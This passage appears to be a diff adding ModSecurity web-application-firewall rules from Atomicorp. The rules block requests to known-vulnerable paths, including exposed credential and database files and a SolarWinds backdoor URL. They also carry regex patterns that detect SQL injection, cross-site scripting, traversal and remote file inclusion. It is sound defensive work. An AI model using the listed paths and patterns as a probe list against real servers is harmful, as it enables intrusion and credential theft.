+SecRule REQUEST_URI "/events4\.nsf"         "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310195,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch:  Domino events4.nsf access attempt'"
+
+
+# Rule 310196:  Domino ntsync4.nsf access
+SecRule REQUEST_URI "/ntsync4\.nsf"         "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310196,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch:  Domino ntsync4.nsf access attempt'"
+
+
+# Rule 310197:  Domino collect4.nsf access
+SecRule REQUEST_URI "/collect4\.nsf"         "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310197,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch:  Domino collect4.nsf access attempt'"
+
+
+# Rule 310198:  Domino mailw46.nsf access
+SecRule REQUEST_URI "/mailw46\.nsf"         "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310198,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch:  Domino mailw46.nsf access attempt'"
+
+
+# Rule 310199:  Domino bookmark.nsf access
+SecRule REQUEST_URI "/bookmark\.nsf"         "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310199,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch:  Domino bookmark.nsf access attempt'"
+
+
+# Rule 310200:  Domino agentrunner.nsf access
+SecRule REQUEST_URI "/agentrunner\.nsf"         "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310200,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch:  Domino agentrunner.nsf access attempt'"
+
+
+SecMarker END_DOMINO_JITP
+
+
+#exe attacks
+SecRule REQUEST_FILENAME "@endswith .exe"         "id:333880,phase:2,t:none,t:lowercase,pass,nolog,noauditlog,skip:1"
+SecAction "phase:2,id:309014,t:none,pass,nolog,noauditlog,skipAfter:END_EXE_JITP"
+
+
+# Rule 310101:  imagemap.exe overflow attempt
+SecRule REQUEST_URI "/imagemap\.exe\?"         "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310101,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: imagemap.exe overflow attempt'"
+
+
+# Rule 310180:  Talentsoft Web+ Source Code view access
+SecRule REQUEST_URI "/webplus\.exe\?script=test\.wml"         "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310180,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch:  Talentsoft Web+ source code access attempt'"
+
+SecMarker END_EXE_JITP
+
+#dll attacks
+SecRule REQUEST_FILENAME "\.dll"         "id:333881,phase:2,t:none,t:lowercase,pass,nolog,noauditlog,skip:1"
+SecAction "phase:2,id:309015,t:none,pass,nolog,noauditlog,skipAfter:END_DLL_JITP"
+
+
+# Rule 310226:webdav search attack
+SecRule REQUEST_URI  "/_vti_bin/(?:_vti_(?:aut|adm)/(?:fp30reg|author|dvwssr|admin)|shtml)\.dll"         "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310226,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Microsoft Frontpage exploit attempt'"
+
+
+# Rule 310728:/pbserver/pbserver.dll
+SecRule REQUEST_URI  "/pbserver/pbserver\.dll"         "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310728,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: /pbserver/pbserver.dll exploit attempt'"
+
+
+# Rule 310729:/iiswebagentif.dll
+SecRule REQUEST_URI  "/iiswebagentif\.dll"         "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310529,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: /iiswebagentif.dll exploit attempt'"
+
+
+# Rule 310709: /fsms/fsmsh.dll
+SecRule REQUEST_URI  "/fsms/fsmsh\.dll"         "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310709,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: /fsms/fsmsh.dll exploit attempt'"
+
+
+# Rule 310710: /msadc/msadcs.dll
+SecRule REQUEST_URI  "/msadc/msadcs\.dll"         "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310710,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: /msadc/msadcs.dll exploit attempt'"
+
+
+# Rule 310711: /isapi/tstisapi.dll
+SecRule REQUEST_URI  "/isapi/tstisapi\.dll"         "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310711,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: /isapi/tstisapi.dll exploit attempt'"
+
+
+# Rule 310711: /webadmin.dll
+SecRule REQUEST_URI  "/webadmin\.dll"         "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310712,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: /webadmin.dll exploit attempt'"
+
+SecMarker END_DLL_JITP
+
+#xml attacks
+SecRule REQUEST_FILENAME "@endswith .xml"         "id:333882,phase:2,t:none,t:lowercase,pass,nolog,noauditlog,skip:1"
+SecAction "phase:2,id:309016,t:none,pass,nolog,noauditlog,skipAfter:END_XML_JITP"
+
+
+#Moved from embargoed rules
+SecRule REQUEST_URI  "/swip/upd/solarwinds\.cortexplugin\.components\.xml"         "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:340000,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Solarwinds backdoor attempt'"
+
+SecRule REQUEST_URI  "/swip/(?:events|upload|upd)"         "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:340001,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Solarwinds backdoor attempt'"
+
+
+# Rule 310729: Oracle SQL config theft attempt
+SecRule REQUEST_URI  "xsql/lib/xsqlconfig\.xml"         "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310729,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Oracle SQL config theft attempt'"
+
+
+# Rule 310713: soapconfig.xml theft
+SecRule REQUEST_URI  "/soapdocs/webapps/soap/web-inf/config/soapconfig\.xml"         "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310713,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Java App Server SOAP config theft attempt'"
+
+
+# Rule 310714: /nps/packages/iman_mod_desc.xml  theft
+SecRule REQUEST_URI  "/nps/packages/iman_mod_desc\.xml"         "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310714,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Java App Server SOAP config theft attempt'"
+
+#dwsync.xml
+SecRule REQUEST_URI  "a_notes/dwsync\.xml"         "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310715,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Possible Dreamweaver Information Disclosure'"
+
+
+SecMarker END_XML_JITP
+
+#.inc files attacks
+SecRule REQUEST_FILENAME "@endswith .inc"         "id:333883,phase:2,t:none,t:lowercase,pass,nolog,noauditlog,skip:1"
+SecAction "phase:2,id:309017,t:none,pass,nolog,noauditlog,skipAfter:END_INC_JITP"
+
+
+# Rule 310207:  PCCS mysql database admin tool access
+SecRule REQUEST_URI "pccsmysqladm/incs/dbconnect\.inc"         "id:310207,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch:  PCCS MySQL database admin tool access attempt'"
+
+
+# Rule 310218:  myphpPagetool pt_config.inc file include
+SecRule REQUEST_URI  "/doc/admin"         "id:310218,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: : myphpPagetool pt_config.inc file inclusion attempt',chain"
+SecRule REQUEST_URI "pt_config\.inc"
+
+
+# Rule 310012: WEB-PHP phplib remote command attempt
+SecRule REQUEST_URI   "/db_mysql\.inc"         "id:310012,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phplib remote command attempt'"
+
+
+# Rule 310074:myphpPagetool pt_config.inc file include
+SecRule REQUEST_URI "/doc/admin*ptinclude*pt_config\.inc"         "id:310074,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Pagetool pt_config.inc file include'"
+
+SecMarker END_INC_JITP
+
+#html attacks
+SecRule REQUEST_FILENAME "\.p?html?$"         "id:333884,phase:2,t:none,t:lowercase,pass,nolog,noauditlog,skip:1"
+SecAction "phase:2,id:309018,t:none,pass,nolog,noauditlog,skipAfter:END_HTML_JITP"
+
+#/genericons/example.html
+SecRule REQUEST_URI "/genericons/example\.html"  "phase:2,capture,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,capture,id:336479,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Wordpress DOM XSS Attack',logdata:'%{TX.0}'"
+
+
+
+# Rule 310087: TIKIWIKI
+SecRule REQUEST_URI  "/tiki-map.p?html\?mapfile=\.\./\.\./"         "id:310087,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: TikiWiki directory traversal'"
+
+
+# Rule 310183:  Tomcat server exploit access
+SecRule REQUEST_URI "/contextadmin/contextadmin\.html"         "id:310183,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch:  tomcat contextAdmin exploit attempt'"
+
+
+# Rule 310019: 12Planet Chat Server Path Disclosure
+# CVE: "CVE-MAP-NOMATCH"
+SecRule REQUEST_URI "/qwe/qwe/index\.html"         "id:310483,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: 12Planet Chat Server Path Disclosure'"
+
+
+# Rule 310019: Interchange Catalog Skeleton SQL Injection and ITL Injection Vulnerabilities
+SecRule REQUEST_URI "/forum/submit\.html"  "chain,t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:390489,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Interchange Catalog Skeleton SQL Injection and ITL Injection Vulnerabilities'"
+SecRule REQUEST_URI "(?:(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(?:from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|\[include\])"
+
+
+# Rule 310019: Nephp Publisher SQL Injection Vulnerabilities
+SecRule REQUEST_URI "/index\.html" "chain,t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:390488,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Nephp Publisher SQL Injection Vulnerabilities'"
+SecRule ARGS:id|ARGS:nnet_catid "(?:(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|\'|union.*select.*from)"
+
+
+# Rule 310019: OpenEdit Cross-Site Scripting Vulnerabilities
+SecRule REQUEST_URI "results\.html" "chain,id:390487,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: OpenEdit Cross-Site Scripting Vulnerability'"
+SecRule ARGS:oe-action|ARGS:page "(<[[:space:]]*(script|about|applet|activex|chrome)|onmouseover=\'javascript)"
+
+#Xpoze "reed" SQL Injection Vulnerability
+SecRule REQUEST_URI "account/user/mail\.html"         "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,chain,id:390169, rev:2, severity:2, msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Xpoze reed SQL Injection Vulnerability'"
+SecRule ARGS:reed "(?:(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(?:from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|\'|union.*select.*from)"
+
+#join.html?jpage
+SecRule REQUEST_URI "/join\.html" "chain,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:390193,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Join.html file inclusion vulnerability'"
+SecRule ARGS:jpage  "(?:\.\./\.\.|/etc|(?:gopher|ogg|zlib|(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/))"
+
+SecMarker END_HTML_JITP
+
+#txt attacks
+SecRule REQUEST_URI "@endswith .txt"         "id:333885,phase:2,t:none,t:urlDecodeUni,t:lowercase,pass,nolog,noauditlog,skip:1"
+SecAction "phase:2,id:309019,t:none,pass,nolog,noauditlog,skipAfter:END_TXT_JITP"
+
+#/data/admin/allowurl.txt
+SecRule REQUEST_URI "/data/admin/allowurl\.txt" "deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:lowercase,id:373357,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: DedeCMSv5 Probe'"
+
+#/revslider/release_log.txt
+SecRule REQUEST_URI "/wysija-newsletters\/readme\.txt"         "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:lowercase,id:311098,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Possible Revslider exploit attempt'"
+
+
+SecRule REQUEST_URI|ARGS "/wysija-newsletters\/readme\.txt"         "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:lowercase,id:310098,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Possible WYSIJA exploit attempt'"
+
+
+# Rule 310097:  /wwwboard/passwd.txt access
+SecRule REQUEST_URI "/wwwboard/passwd\.txt"         "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:lowercase,id:310097,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: /wwwboard/passwd.txt access'"
+
+
+# Rule 310184:  Ecommerce import.txt access
+SecRule REQUEST_URI "/orders/import\.txt"         "phase:2,t:none,t:urlDecodeUni,t:lowercase,deny,log,auditlog,status:403,id:310184,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch:  eCommerce import.txt access attempt'"
+
+
+# Rule 310202:  Ecommerce checks.txt access
+SecRule REQUEST_URI "/orders/checks\.txt"         "phase:2,t:none,t:urlDecodeUni,t:lowercase,deny,log,auditlog,status:403,id:310202,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch:  Ecommerce checks.txt access attempt'"
+
+
+# Rule 310019:  Simple PHP Blog Exposure of user Credentials
+SecRule REQUEST_URI "config/password\.txt" "phase:2,t:none,t:urlDecodeUni,t:lowercase,id:390486,deny,log,auditlog,status:403,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Simple PHP Blog Exposure of user Credentials'"
+
+SecMarker END_TXT_JITP
+
+#/db/valid.users
+SecRule REQUEST_FILENAME "db/valid\.users"         "phase:2,deny,log,auditlog,status:403,id:312318,t:none,t:urlDecodeUni,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHP file manager database access attempt'"
+
+#log disclosure attacks
+SecRule REQUEST_FILENAME "logs/sql-error\.log"         "phase:2,deny,log,auditlog,status:403,id:312310,t:none,t:urlDecodeUni,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: SQL error log access attempt'"
+
+#db attacks
+SecRule REQUEST_FILENAME "@endswith db"         "id:333886,phase:2,t:none,t:lowercase,pass,nolog,noauditlog,skip:1"
+SecAction "phase:2,id:309020,t:none,pass,nolog,noauditlog,skipAfter:END_MDB_JITP"
+
+
+
+# Rule 310318: betaparticle blog Discloses Database to Remote users
+#       and Lets Remote users Upload/delete Arbitrary Files
+SecRule REQUEST_URI "database/dbblogmx\.mdb"         "phase:2,deny,log,auditlog,status:403,id:310318,t:none,t:urlDecodeUni,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Betaparticle Blog dbBlogMX.mdb database access attempt'"
+
+
+# Rule 310319: betaparticle blog Discloses Database to Remote users
+SecRule REQUEST_URI "/blog\.mdb"         "phase:2,deny,log,auditlog,status:403,id:310319,t:none,t:urlDecodeUni,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Betaparticle Blog Blog.mdb database access attempt'"
+
+
+# Rule 310019: HTMLJunction EZGuestbook Remote Database Disclosure Vulnerability
+SecRule REQUEST_URI|ARGS "/datastores/guestbook\.mdb" "phase:2,deny,log,auditlog,status:403,id:390485,t:none,t:urlDecodeUni,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: HTMLJunction EZGuestbook Remote Database Disclosure Vulnerability'"
+
+
+# Rule 310019: Sukru Alatas Guestbook Exposure of user Credentials
+SecRule REQUEST_URI|ARGS "db/gbdb\.mdb" "phase:2,deny,log,auditlog,status:403,id:393485,t:none,t:urlDecodeUni,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Sukru Alatas Guestbook Exposure of user Credentials'"
+
+
+# Rule 310019: uguestbook exploit
+SecRule REQUEST_URI "/mdb-database/guestbook\.mdb" "phase:2,deny,log,auditlog,status:403,id:390484,t:none,t:urlDecodeUni,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: uguestbook Exposure of user Credentials'"
+
+
+# Rule 310019: information Call Center "CallCenterData.mdb" Exposure of user Credentials
+SecRule REQUEST_URI "callcenterdata\.mdb" "phase:2,deny,log,auditlog,status:403,id:390483,t:none,t:urlDecodeUni,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: information Call Center Exposure of user Credentials'"
+
+
+# Rule 310019: information Call Center "CallCenterData.mdb" Exposure of user Credentials
+SecRule REQUEST_URI "/(?:hsh|hytop)\.mdb" "phase:2,deny,log,auditlog,status:403,id:391487,t:none,t:urlDecodeUni,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Attempted hsh.mdb file access'"
+
+SecMarker END_MDB_JITP
+
+#jsp attacks
+SecRule REQUEST_FILENAME "\.jspa?$"         "id:333887,phase:2,t:none,t:lowercase,pass,nolog,noauditlog,skip:1"
+SecAction "phase:2,id:309021,t:none,pass,nolog,noauditlog,skipAfter:END_JSP_JITP"
+
+#/secure/ContactAdministrators!default.jspa
+SecRule REQUEST_URI "/secure/contactadministrators\!default\.jspa"         "phase:2,deny,log,auditlog,status:403,t:none,t:lowercase,id:311299,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Secure Contact Administrators data leak block '"
+
+# Rule 310299: Macromedia SiteSpring XSS
+#SecRule REQUEST_URI "cabo/jsps/a\.jsp" #        "phase:2,deny,log,auditlog,status:403,t:none,t:lowercase,chain,id:311299,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Oracle E-Business Suite 12.1.3 / 12.2.x Open Redirect '"
+#SecRule ARGS:redirect "\\" "t:none"
+
+
+# Rule 310299: Macromedia SiteSpring XSS
+SecRule REQUEST_URI "/error/500error\.jsp"         "phase:2,deny,log,auditlog,status:403,chain,id:310299,t:none,t:lowercase,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Macromedia SiteSpring 500error.jsp cross-site-scripting attempt'"
+SecRule ARGS:et "<[[:space:]]*(?:script|about|applet|activex|chrome)" 
+
+# Rule 310019: ManageEngine netFlow Analyzer "grDisp" Cross-Site Scripting
+SecRule REQUEST_URI "/index\.jsp" "phase:2,deny,log,auditlog,status:403,chain,t:none,t:lowercase,id:390482,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: ManageEngine netFlow Analyzer Cross-Site Scripting Vulnerability'"
+SecRule ARGS:grDisp "<[[:space:]]*(?:script|about|applet|activex|chrome)"
+
+
+# Rule 310019: FileLister "searchwhat" Cross-Site Scripting Vulnerability
+SecRule REQUEST_URI "/definesearch\.jsp" "phase:2,deny,log,auditlog,status:403,chain,id:390481,t:none,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: FileLister searchwhat Cross-Site Scripting Vulnerability'"
+SecRule ARGS:searchwhat "(<[[:space:]]*(script|about|applet|activex|chrome)|onmouseover=)"
+
+
+
+
+SecMarker END_JSP_JITP
+
+#Generic RFI/injection rules
+SecRule ARGS|REQUEST_URI "@pm http:// https:// ftp:// ftps:// ogg:// zlib:// gopher:// ../"         "id:333888,phase:2,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:replaceNulls,t:compressWhiteSpace,t:lowercase,pass,nolog,noauditlog,skip:1"
+SecAction "phase:2,id:309022,t:none,pass,nolog,noauditlog,skipAfter:END_JITP_INJECTION_RULES"
+
+
+# Rule 310047:General phpbb_root_path vulnerabilities
+SecRule ARGS:phpbb_root_path|ARGS:basepath "(?:(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/|\.\./|^test|\?\?$)"         "phase:2,deny,log,auditlog,status:403,id:310047,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Generic PHP application RFI exploitation attempt',t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhiteSpace"
+
+
+# Rule 310305: b2 arbitrary command execution attempt
+SecRule REQUEST_URI "/b2-include/"         "phase:2,deny,log,auditlog,status:403,chain,id:310305,rev:2,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: b2-include local command execution attempt',t:none,t:urlDecodeUni,t:lowercase,t:compressWhiteSpace"
+SecRule REQUEST_URI "b2inc" "chain"
+SecRule REQUEST_URI "http"
+
+
+# Rule 310019:  MWChat "config[mwchat_libs]" File Inclusion Vulnerability
+SecRule REQUEST_URI "config\[mwchat_libs\]" "phase:2,deny,log,auditlog,status:403,chain,id:390480,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: MWChat file include Vulnerability',t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase"
+SecRule REQUEST_URI "(?:/\.\./|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)"
+
+
+# Rule 310019:  YaPiG Multiple Vulnerabilities
+SecRule ARGS:base_dir "(?:/\.\./|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" "phase:2,deny,log,auditlog,status:403,id:390479,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Yapig remote file include Vulnerability',t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase"
+
+
+# Rule 310019: yawp "_yawp[conf_path]" File Inclusion Vulnerability
+SecRule ARGS:_yawp[conf_path] "(?:(?:\.\./|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)|(?:\.\./|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/))" "phase:2,deny,log,auditlog,status:403,id:390478,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: yawp file include Vulnerability',t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase"
+
+
+# Rule 310019: PHP iCalendar File Inclusion Vulnerability and XSS
+SecRule REQUEST_URI "phpicalendar" "phase:2,deny,log,auditlog,status:403,chain,id:390477,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHP iCalendar File Inclusion Vulnerability and XSS',t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase"
+SecRule REQUEST_URI "cookie_view" "chain"
+SecRule REQUEST_URI "(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/"
+
+
+# Rule 310019:  SocketKB 1.1.x file include Vuln
+SecRule REQUEST_URI "\?__f=(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/" "phase:2,deny,log,auditlog,status:403,id:390476,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: SocketKB 1.1.x file include Vulnerability',t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase"
+
+
+# Rule 310019: Generic BBCodeFile variable remote file include
+SecRule ARGS:BBCodeFile "(?:(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/|\.\./\.\.)" "phase:2,deny,log,auditlog,status:403,id:390084,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Generic BBCodeFile variable Remote File Inclusion Vulnerability',t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase"
+
+
+# Rule 310019: Generic wb_class_dir variable remote file include
+SecRule ARGS:wb_class_dir "(?:(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/|\.\./\.\.)" "phase:2,deny,log,auditlog,status:403,id:390085,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Generic wb_class_dir variable Remote File Inclusion Vulnerability',t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase"
+
+
+# Rule 310019: Generic component_dir variable remote file include
+SecRule ARGS:component_dir "(?:(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/|\.\./\.\.)" "phase:2,deny,log,auditlog,status:403,id:390086,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Generic component_dir variable Remote File Inclusion Vulnerability',t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase"
+
+
+# Rule 310019: Generic da_path variable remote file include
+SecRule ARGS:da_path "(?:(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/|\.\./\.\.)" "phase:2,deny,log,auditlog,status:403,id:390087,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Generic da_path variable Remote File Inclusion Vulnerability',t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase"
+
+
+# Rule 310019: Generic spaw_root variable remote file include
+SecRule ARGS:spaw_root "((?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/|\.\./\.\.)" "phase:2,deny,log,auditlog,status:403,id:390088,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Generic spaw_root variable Remote File Inclusion Vulnerability',t:none,t:urlDecodeUni,t:lowercase,t:compressWhiteSpace"
+
+
+# Rule 310019: Generic sitee variable remote file include
+SecRule ARGS:sitee "(?:(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/|\.\./\.\.)" "phase:2,deny,log,auditlog,status:403,id:390089,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Generic sitee variable Remote File Inclusion Vulnerability',t:none,t:urlDecodeUni,t:lowercase,t:compressWhiteSpace"
+
+
+# Rule 310019: Generic root_path variable remote file include
+SecRule ARGS:root_path "(?:(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/|\.\./\.\.)" "phase:2,deny,log,auditlog,status:403,id:390094,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Generic root_path variable Remote File Inclusion Vulnerability',t:none,t:urlDecodeUni,t:lowercase,t:compressWhiteSpace"
+
+
+# Rule 310019: Vivvo Article Management classified_path file inclusion
+SecRule ARGS:classified_path "(?:(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/|\.\./\.\.)" "phase:2,deny,log,auditlog,status:403,id:390105,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Vivvo Article Management CMS File Inclusion',t:none,t:urlDecodeUni,t:lowercase,t:compressWhiteSpace"
+
+
+# Rule 310019: CCleague Pro "language" Parameter Local File Inclusion
+SecRule ARGS:language "(?:(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/|\.\./\.\.)" "phase:2,deny,log,auditlog,status:403,id:390109,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: CCleague Pro language Parameter Local File Inclusion',t:none,t:urlDecodeUni,t:lowercase,t:compressWhiteSpace"
+
+
+# Rule 310019: ff_compath remote file inclusion
+SecRule ARGS:ff_compath "(?:(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/|\.\./\.\.)" "phase:2,deny,log,auditlog,status:403,id:394150,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: ff_compath File Inclusion Vulnerabilities',t:none,t:urlDecodeUni,t:lowercase,t:compressWhiteSpace"
+
+#  Rule 310019: xcart exploit test
+SecRule ARGS:xcart_dir "(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/"         "phase:2,deny,log,auditlog,status:403,id:390166, rev:1, severity:2, msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: xcart remote include',t:none,t:urlDecodeUni,t:lowercase,t:compressWhiteSpace"
+
+#Honeypot
